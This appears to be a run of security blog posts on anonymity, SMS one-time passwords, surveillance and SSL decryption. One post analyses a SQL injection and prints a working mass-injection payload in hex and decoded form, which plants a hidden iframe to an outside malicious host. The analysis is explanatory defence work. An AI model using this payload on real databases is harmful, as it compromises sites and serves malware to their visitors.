A good analogy to anonymity is basic physical security.  I have security at my home, the doors lock, the windows close and lock, only certain people have keys, there is an alarm system.  If you compare my home security to the home security of a criminal organization’s leader, you can be certain they will have more security than I do in my home.  They may have people standing post  watching all sides of the house, large perimeter fences with alarms, bullet proof windows, steel doors with re-enforced frames, hired bodyguards through the home, rehearsed escape plans with get-away vehicles and whatever else they deem necessary.  You can walk up to my front door and ring the doorbell, I might even answer if I am home.  You would have to first find the home of the leader in a criminal organzation.  They probably have multiple homes, so you would have to determine which one they were in at a particular time.  Assuming you could accomplish that, you probably will not make it to the front door if you were to try let alone have the leader answer the door if you were able to physically get to the door.  It is not just that the criminal organization has way more money than I do as to why they have better security.  It is because they have something that is of much higher financial value than I do.  A criminal organization that has something of value to protect (merchandise, leader, industry knowledge) and is willing to spend more money on security because the risk of loosing what they are protecting is greater.  Security is the same with any organization be it financial, private, pharmaceutical, mining, government, or whatever.  What are the most treasured items or knowledge I have to protect?  How much do I have to loose if those items or knowledge was stolen or obtained?  What is an acceptable level of risk for loosing this property or knowledge?  What will the cost of security be to get to an acceptable level of risk?

Anonymity is no different.  If I want to purchase a gift for a family member that costs $100. I can spend hours, setting up tunnelling protocols, configuring a special browser and operating system, setting up an untraceable method of payment so that I can place my order knowing with confidence that my family, my ISP, law enforcement, and anyone else won’t know (at least not without a lot of time and money on their part).  I may have to learn how to do all this.  But even if someone does know it takes time to set this up, check that it is in fact secure.  For me, that time is worth more than the $100 dollars I am spending on the gift.  I’d probably just order it on a normal PC, using a normal Internet connection, clear the browser history, and hope no one sees the credit card statement before the gift arrives.  Could my ISP see that I ordered flowers? If they wanted to yes.  Do I care? Not really.

But what if I want to browse a particular website and not have Google know about it?  What if I wish to do research on a particular topic that I don’t want any person, group or company knowing that I am interested in that topic?  What if I am conducting an investigation into an individual who works for a company and we know he is technically savvy and has an intricate knowledge of security?  In those cases, it is worth my time to plan properly so the risk of being exposed is reduced.  These questions and how to will be the topic of a series of blog posts I will write entitled “So, you want to be anonymous.”  I am not sure how many posts will be in the series yet (I suspect 4 or 5), but I will try to keep each post short and cover one topic of maintaining anonymity.  Anonymity on the Internet is something that has always interested me and many others.  There is lots of information on the Internet about it (both true and false information).  I used to have to keep up with being anonymous in order to do some of the work I have done in the past.  Today, I mainly keep up with it, just because it interests me.  The next posts in this series will start with a general discussion on a few of the basic ways you can be monitored from the network as well as application levels. Next we can discuss ways to avoid being monitored, minimize digital trace evidence that can lead back to a particular target from the network, service, and application perspective.

Series Index:

1. Your IP Address, the low hanging fruit

  Photo courtesy of…

While some of my information on this topic has come from blogs I follow, as well as discussions with friends and co-workers I still keep in touch with since I left the telecommunications industry, a main source has been a long time friend of mine.  He owns a small ISP in London, became involved with CNOC, a group of ISPs in Canada attempting to fight the CRTC ruling permit Bell to charge in this manner.

While I don’t agree with the CRTC permitting Bell to charge in this manner given their obvious monopoly and reach, there is a couple of positive things I see as a result.   On a personal note, it is nice to see my friend engaging with other ISPs in this discussion and taking more of an active role.  That behaviour is not a natural for him and pushes him outside his comfort zone.   I am happy to see him doing this.  From a general perspective, while the decision is not in my opinion smart from a competitive perspective, I think it is at least a step forward because it forces  ISPs to start charging bandwidth costs to end consumers that use the resource.  This is something that should have happened years ago, and I believe that if it did it would have made the Net Neutrality debate non-existent or at least much less of a debate.  As I have stated before, in my opinion I believe bandwidth is a utility and today more than ever, it’s characteristics are similar to a utility.  It should be regulated as such and charged according market costs in a real competitive environment, not a monopoly (of course in Canada there is a monopoly, or at least an environment that is pretty close to one).

As a result of this new legislation, I have started monitoring bandwidth usage from my home connection.  I wrote a very basic script that simply queries the internet interface of my gateway every 5 minutes, gathers the raw transmit and receive bytes and stores them in a file along with a time stamp.

Once usage based billing (ubb) takes effect in March 2011, I plan to take this data and using Python generate some graphs, and put the bandwidth usage into a format that can be compared  to the usage  my ISP generates as well as the usage  that Bell provides on my DSL line.   In my experience, measurement is a tricky thing, and I am curious in any differences that might arise.

photo credit

Here is how it works.  Let’s use on-line banking as an example.  Using their home laptop, the customer connects to their financial institutions on-line banking site.  Customer enters their access card and password.  Upon successful verification of the access card and password, the screen prompts customer to enter a one time password.  That password is sent via SMS to the mobile number previously provided by the customer.  Upon receipt of the SMS message containing the one time password, the customer enters that password into the screen on their laptop.  Assuming it is correct, the customer is permitted to proceed with their banking.

It protects against phishing from a separate system.  When a bot is installed that attempts to grab and extract your access card and password, that is no longer enough.  It also has to figure out a way to capture the next one-time password, much more difficult.  It makes re-sale of customer access card numbers, passwords, credit card numbers and other information practically useless.  Selling this information  to criminals is big business today.

The one time password is only valid for the current session which is already established.  Any new or future session requires a new one time password.  The password is transmitted on a completely separate channel from the session being verified.  The device is separate, the network is separate and the company providing the transmission of the password (in this case the mobile operator) is separate.  For this attack to be repeatable, the attacker would have to compromise the SMS phone system on top of your laptop or bank infrastructure. While this is probably not impossible, it is a lot more difficult.

OTP over SMS is relatively easy to implement today.  Most people have mobile phones today.  The technology to send SMS is common place.  It is easy for a typical end user to understand the security benefits derived from this method and it is not too cumbersome for them.

It is not fool proof mind you.  Malware that is installed on a device accessing the on-line banking such as your laptop, that is intelligent enough wait for you to enter the one time password, then use that session to attack would still be valid but that is a much harder attack accomplish.  As a result this solution minimizes the attack surface available for attackers.

To make it more secure, the interface to turn on this feature or provide the phone number could be done via customer support only. The customer would have to call in to make the change.  Most people today have mobile phones and typically it is a device that is always physically with them. This makes it a great tool to deploy OTP.

photo credit

Here we have a web server that sends SQL queries to a back end database server.  In between the two servers is a combination firewall / Intrusion Prevention System (IPS) that is configured to detect malicious SQL injection attacks, block the attack and alert security response teams when necessary.  The IPS/Firewall system is independent of the web server and the database server.  It is a independent system designed to simply detect and respond to attacks by watching the communication between devices.

Eventually, a security consultant is hired to conduct a security review.  One recommendation she makes is that the information being transmitted between the web server and the database server contains confidential information and therefore should be encrypted.   Turning on encryption seems like a good idea, now the data between the web server and database server can not be viewed by anything but the intended servers.  The problem is that includes the IPS system which is designed to protect the database server from SQL injection attacks.   Now an attacker can attack the system feeling secure that their attacks are hidden inside the encryption and undetectable.

Security policies that recommend a particular type of data should be encrypted need to take into account more than just the data.  They also need to take into account the location of the source and destination of the transmission, the physical and other security controls and systems involved in and around the transmission.  No one would argue that a credit card being transmitted on the Internet should be encrypted.  It will pass through networks and devices that are not under the sender or receivers control and therefore has a high risk of interception.  If that same credit card number is being transmitted from a sender to receiver where both are in the same data center, access to devices in the data center are tightly controlled, then adding encryption only increases the complexity, hides attackers, and offers minimal to no value.  Some suggest that  in the data center someone might be able to gain access, and sniff the traffic to obtain the transmitted credit card therefore you have to encrypt the data.  If that is truly the case, I’d suggest they have much bigger security concerns than someone sniffing data.

When making a decision on weather to encrypt data, does your organization take a look at the data, application, network design and other factors when assessing risk, or do they just look at the data?

I think this attack is a really good example of how it is difficult for firewall, IPS, and IDS vendors to detect these type of attacks.  While the ability to do so is improving every day, and vendors will claim they can (and in some cases they can), the bad guys do have the advantage.  For the purposes of this post, I want to focus on how the attack attempts to hide from deployed security systems.  This attack can be used as a great example of how easy it is to evade detection systems for people that are not technically dealing with attacks day to day and wonder why it is so hard.

The key to this attack is the CAST function.  This function (which is available in many programming languages), will convert one data type to another.  A set of integers to a letter, a decimal number to a hexadecimal number are two examples.   In the attack, hexadecimal is used to mask the alphanumeric requests to the database.

If you look at the actual CAST function request, you see a 0x (means the next characters are a hexadecimal base) followed by:

6445634c417245204054207661526368615228323535292c406320764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e616d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e696420614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e78545950653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d205461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722834303030292c5b272b40432b275d29292b6361535428307833433639363637323631364436353230373337323633334432323638373437343730334132463246364536353644364636383735363936433634363936393645324537323735324637343634373332463637364632453730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323634363937333730364336313739334136453646364536353232334533433246363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c655f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c655f435552736f7220

The CAST function will convert the hexadecimal above to alphanumeric. The result of that conversion is:

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe=’U’ and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc(‘UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))’) FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

Now you can see how this looks more like a SQL statement, it is just masked.  Where it becomes difficult for IPS/IDS vendors is that the translation that I did above, doesn’t happen until it reaches the sql engine for the targeted database.  So in flight through network it appears as hexadecimal.  Do you design your IPS/IDS systems with a sql engine that performs this function on every command?  That takes time and resources. And what would you trigger on exactly in the decoded section above?  The most logical thing to detect on in the decoded section, the attackers have actually hidden.

If you look carefully, there is a second CAST function nested within the first CAST function.

caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E

If you convert the hexadecimal in this inner CAST function you get:

<iframe src=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″ height=”0″ style=”display:none”></iframe>

This would be the logical area to detect.  A SQL query containing an HTML IFRAME tag to an external unknown website.  And this is the attack.  The problem is that the IPS/IDS, firewall or other security would have to do the extra function of converting the CAST within the CAST function.

Processing recursively  is resource intensive.  How many times to you recurse through the CAST function?  Are there other functions in SQL you should check?  What about if it is not hexadecimal but octal or some other numerical base?

While security vendors often claim they can detect the above, there are often many conditions around those claims that they do not explain.  Encryption, nested functions as above are but a few examples.  These problems go beyond just SQL injection as well, and apply for many types of attacks.

When evaluating these technologies, it is important that you have someone on your side that is independent of any vendors.  An employee or consultant that understands your requirements, is technically sound and solid about how the technology works (not just in theory), and can work on your behalf to ensure you understand exactly what the technologies can and can not do.  You then have a real understanding of the risks and exposures you face.

photo credit

All HTTP goes through a proxy. If you connect to a service provider, all your flows go through an HTTP proxy system.  The proxy system scans requests and compares them to a database of categorized sites.   The government provides policies to the service providers, and it is required by law they are enforced.  They are enforced in real time.  Attempting to visit an unauthorized site you will be re-directed to a page in Arabic explaining that it is not permitted.  I actually kept a screen capture of the page and was going to post it, but I can’t find it.  However, if you are in Dubai, just try to go to a site that has questionable material.  You will be re-directed.  Anyone can do it, it is not a secret.

HTTPS was ready to be implemented. Approximately 2 years ago, they were testing the ability to decrypt SSL on the fly so that they could perform analysis on the requests and grant or deny access as with HTTP traffic.  I am sure this is deployed by now.

Voice Over IP, Instant messaging and other protocols had specific policies. I won’t go into the details here, as I don’t know how public this information is, but there were active policies deployed around these and other protocols.

Privacy is not the same as North America. In North America, we many feel that privacy is slowly being eroded.  In comparison to Dubai our policies with respect to privacy are impressive.  The ISP has the right to watch what you are doing and actively grant, block, and log your activities.  It is actually a requirement in order to get a license to be an ISP from the Government.

When Saudi Arabia indicated they were going to ban Research In Motion devices due to the fact the government was unable to decrypt communications as needed, I was hopeful that RIM would say too bad.  Of course that was the idealist in me hoping that RIM, a Canadian company with one of their key features they market is  about Blackberry and its security would not be compromised.  The realist in me understands that the Middle East is a growing market and from a business perspective RIM has no choice but to be a part of it.  If you want to do business in Canada you have to play by our rules, so it only makes sense that if you want to do business in the U.A.E., you have to play by their rules.  As expected, RIM reached a deal with Saudi Arabia.  They also reached a deal with India earlier this week.

What I find amusing is the latest Spin they have put on security given the situation.

RIM made no direct comment on any discussions with the UAE or others, but it sought to reassure customers about the security of their data on BlackBerry networks.  “While RIM does not disclose confidential regulatory discussions that take place with any government, RIM assures its customers that it is committed to continue delivering highly secure and innovative products that satisfy the needs of both customers and governments,” the company said in a statement to customers.

A RIM spokeswoman could not be reached for comment.

RIM said in its statement that under its security system customers have their own encryption key and “only the customer ever possesses a copy” of that key.

While I am sure they have not lied, you can’t have it both ways.  Either you comply with the government request that they can decrypt messages and data as they require, or you don’t.  Any other suggestion implies that the laws within the UAE have changed.  I am not a lawyer, but I haven’t seen any news about new laws protecting UAE citizens privacy.  The best part is the last statement how the customers have their own encryption key that only they possess.  I am sure that statement is true.   But it is what is not said that is telling.  Are there any more encryption keys other than the one the customer possesses with respect to the customer’s messages?   Companies that deploy encryption and decryption of email, files, and data in general give each employee a copy of their own key that only they possess.  When encrypting data, the system creates some sort of a unique key (lets call it E) that is actually used to encrypt or decrypt the data.  The E key is then encrypted with the customers encryption key (lets call that key Ec).  The trick with businesses, is that the E key’ is also encrypted with their own key (lets call it Eb).  If you loose your key (Ec) or refuse to give it when asked, they can use their key Eb to decrypt and obtain E key.  Once they have the E key, they can then decrypt the message.  There are several variations to this but the basic premise from a recovery perspective are the same.

This is not the first time this has happened either.  Not sure how many people remember Hushmail.  I wrote about them here.  Hushmail marketing was based on the fact that if you used them for email, no one but you could retrieve your email stored on their servers.  Even Hushmail staff was not able to retrieve the email if they wanted to as they did not have the keys.  (Sound familiar to the RIM article above?).  Yet, when U.S. law enforcement contacted them about an individual they were investigating, Hushmail was able to provide them with 12 CDs filled with unencrypted emails of the individual under investigation.

While I don’t blame RIM for their bowing to the governments of India and Saudi Arabia if they wish to do business in their countries, I dislike the spin they are placing on security.   They are mis-leading the public and playing on the fact that many people do not understand the intricacies of security.  While they are not lying, I strongly suspect they are not being forthright.

When all the dust settles, it is important that people realize that money is what drives business.  You can claim all morals, goals, and visions you want.  But if at some these come into conflict that causes enough money to be at stake compromises will be made.  Security unfortunately is no different.

One thing I had identified to the client was that the subject was using a type of VoIP software.  They asked if it was possible to listen in on the voice conversations.  I told them it was, and that I could probably get them a copy of the voice conversations the subject previously had during the time I was monitoring.  I had packet captures, most non-encrypted so it was just work and time.  At the clients request, I extracted the VoIP conversations into wmv files using date and time of the call as a file name.

At the end of the job, I was having a conversation with the CTO.  He was wondering if there was an automated way to keep audio conversations of all the employees.  At the time, this technology was not as prevalent, cheap, and available to the general public as it is today.  I asked him if he thought that was really appropriate.  I explained that I had just listened in on someones private conversations.   Maybe it wasn’t any of the companies business.   Maybe there were legalities if they were to do that (yes, I was annoyed).  His response was very quick.  “The company has a right to view all data, monitor activity that its equipment or network is used for, period”.   He told me all the employees know this and sign a document to that effect.  I said that made sense.   I asked him what he would think if he was in a confidential conversation on the phone with someone in a different province and Bell had listened in on his conversation?  I said that I assume he didn’t have problem with it, after all it is their network, their devices.  Aside from the angry facial expression, he said that was ‘different’ and they shouldn’t be allowed to do that.

Fast forward to now.  Everyone has a video camera or picture camera on them as a result of mobile phones.  If you are serious about it, you can find all kinds of tiny spy cameras.  Rob Spence has implanted a camera in his eye. It amuses me when law enforcement gets all concerned about citizens taking their picture and video taping them.  I guess they feel that they should be able to watch and monitor us, but we shouldn’t be able to watch and monitor them.  Of course if they are not doing anything wrong, then they should have nothing to worry about right? (that statement is an entire topic in and of itself).

Everyone has reasons why a particular person or group of people should or should not be monitored.  It really comes down to the basic premise that we as humans don’t want to be monitored, but we want the ability to monitor others, especially if we deem them as a threat.  Government wants the ability to covertly monitor their citizens but do not want organizations covertly monitoring them.  Police want cameras everywhere so they can monitor what is going on and use it to assist with their job, but they don’t want to be video taped in case they get caught doing something controversial, such as Robert Dziekanski being killed by officers at Vancouver airport. The video once released on the Internet, forced police to change their story.  Businesses feel they have a right to monitor their employees, but would have concerns if employees were monitoring some of their activities.

Personally, I think it is futile to attempt to stop one group from monitoring another, especially in public places.  It will never be successful.  Who do you feel should be able to monitor who?   Under what circumstances and conditions is video or audio surveillance appropriate?

photo credit

See, I do research into security technologies as part of my job.  Security is also a personal interest of mine.  As an example, I am currently looking into a particular application that uses SSL to encrypt the data between points.  In order to do what I need to do for the research, I downloaded an open source tool, that basically breaks the SSL.  This allows me to work on my research with the application in question. If that tool was not published due to Bill C-32, then that stops me from doing my research.  I suppose I could create my own version of the tool, but why would I do that if someone already has a tool readily available?  It makes no sense.   The most likely response to my specific example is that SSL isn’t proprietary so it does not matter.  That is true in this case, but what about when I am evaluating a Blackberry PDA or an IPhone?   I suspect RIM and Apple might not take to kindly to me exposing problems in their software.  See, the current Bill C-32 might allow them to do this.   That is bad for security, bad for keeping companies honest.

I think it makes more sense to punish those that use the tools in a wrong way.  If someone was to take the tool, and use it in a botnet to extract credit card information, then the individuals that did this are guilty and should be charged.  The person that made the tool is not the guilty party.  It is like making Smith & Wesson responsible because they created the firearm that was used in a murder.

Overall, I think Bill C-32 has made much progress from the previous bills in Canada.  My hope is that the Government starts to do their job and properly debate the bill and get input from all interested parties, not label people that question them as extremists.

My first day in Dubai, I went to lunch with one of the executives of the Telco.  During our lunch, I asked him how they manage encrypted connections.  He explained that they were currently getting ready to deploy a solution to solve that.  The infrastructure was being upgraded to decrypt all SSL sessions and parse the data as required.   Aside from opening my eyes to the difference in privacy between North America and the Middle East from a privacy perspective, I found it interesting that SSL decrypting was so easily available.   Previously, I had seen software that law enforcement used for this purpose.  I myself had done it for clients using available tools during a engagement.  But these tools were designed more for targeted surveillance, not mass scale.  Like all technology, it improves and gets less expensive over time I guess.

Today, there are many more companies in North America and abroad that either have deployed SSL decrypting capabilities or are in the process of doing so.  Security, diagnostics, audit and legal requirements to know what is coming and leaving their networks and being able to log and trace back data transmissions to the originator are some of the reasons.  One driver is Data Leakage Protection (DLP), currently a very ‘hot’ topic with many new vendors jumping on the opportunity with solutions.  In order to look for data leakage, you need to see past any encryption that might be present.  Cisco, Bluecoat, PaloAlto, Fortinet are just a few companies that offer products for SSL decryption.

With Google deploying encryption for Gmail and more recently searching, plug-ins such as the EFF Firefox plug-in to help secure your communications, companies are feeling more and more concerned about what data is coming and going.  What worries me is that all these security, legal and audit requirements companies face are actually not helping them in the long run.   If these companies are decrypting SSL sessions that egress and ingress their network, you can be sure that other companies are doing the same to theirs.  The net result is that everything is decrypted and no one has any privacy.

Next time you connect to your bank, doctor’s office, insurance company, Gmail or any site and see secure indications from your browser similar to these

along with the companies re-assurances that the site is secure, keep in mind things may not be as they appear – today even more so than yesterday.

Do you deploy any type of decryption on your network?  If it is deployed are you aware of it?

photo credit

There is a need to ensure audit compliance across the entire banking infrastructure.   From a financial perspective, compliance with the various audits is a must if you wish to stay in business.  Of course, my background is in network security.  Network security is not the same as auditing.   Although I have not met anyone that would say if you pass a particular set of audits you are secure, I have noticed across the audit industry in general there seems to be a unstated understanding that if you do pass audits you are secure or more secure than if you don’t.

Passing an audit does not mean you are secure.  Here is one of a few, but simple examples I have come across.  One of the audits requires that your entire internal network has address translation from inside to outside.  Effectively, the idea is that if I as a outside user browse to http://michaeldundas.com, that address would appear to the requester as 216.240.0.43.

From the quick diagram above, you can see how the client thinks that it is directly connected to 216.240.0.43/32, and it is.  Based on the audit requirement of having complete address translation with the untrusted Internet, you would have to configure a device that would convert the IP address the client has, to a different IP address.

The second diagram shows a router configured with Network Address Translation (NAT) to convert the IP address in both directions.  In this way the client does not know the real IP address of the server.   Any attack that you could do without NAT, you can do even if NAT is there.  Anyone that is active in attacking servers knows this.  It offers no additional security, just extra work.

Auditing does have its place and is necessary.  Complying with audit requirements for many industries is not an option and your staff must understand that.  But don’t let yourself or your staff be fooled into thinking audits make you more secure.  Audits help but they are not a substitute for good and proper security.   Passing an audit does not mean you are secure.